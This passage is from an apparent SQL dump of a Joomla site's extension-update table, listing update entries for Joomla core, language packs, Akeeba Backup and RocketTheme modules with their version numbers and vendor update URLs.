AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12475,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12476,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12477,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12478,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12479,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12480,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12481,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12482,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12483,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12484,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12485,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12486,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12487,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12488,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12489,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12490,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12491,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12492,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12493,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12494,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12495,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12496,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12497,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12498,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12499,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12500,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12501,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12502,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12503,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12504,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12505,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12506,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12507,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12508,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12509,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12510,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12511,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12512,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12513,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12514,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12515,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12516,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12517,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12518,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12519,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12520,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12521,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12522,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12523,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12524,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12525,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12526,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12527,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12528,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12529,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12530,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12531,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12532,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12533,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12534,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12535,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12536,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12537,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12538,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12539,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12540,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12541,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12542,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12543,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12544,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12545,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12546,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12547,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12548,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12549,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12550,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12551,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12552,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12553,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12554,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12555,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12556,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12557,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12558,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12559,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12560,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12561,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12562,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12563,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12564,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12565,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12566,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12567,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12568,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12569,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12570,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12571,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12572,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12573,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12574,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12575,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12576,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12577,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12578,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12579,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12580,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12581,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12582,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12583,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12584,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12585,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12586,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12587,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12588,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12589,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12590,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12591,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12592,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12593,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12594,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12595,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12596,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12597,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12598,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12599,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12600,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12601,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12602,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12603,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12604,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12605,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12606,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12607,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12608,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12609,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12610,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12611,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12612,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12613,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12614,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12615,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12616,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12617,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12618,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12619,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12620,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12621,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12622,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12623,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12624,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12625,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12626,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12627,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12628,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12629,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12630,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12631,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12632,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12633,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12634,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12635,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12636,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12637,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12638,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12639,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12640,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12641,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12642,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12643,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12644,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12645,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12646,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12647,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12648,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12649,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12650,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12651,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12652,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12653,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12654,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12655,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12656,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12657,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12658,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12659,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12660,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12661,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12662,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12663,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12664,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12665,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12666,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12667,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12668,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12669,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12670,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12671,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12672,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12673,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12674,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12675,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12676,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12677,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12678,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12679,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12680,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12681,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12682,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12683,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12684,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12685,3,0,'Dari 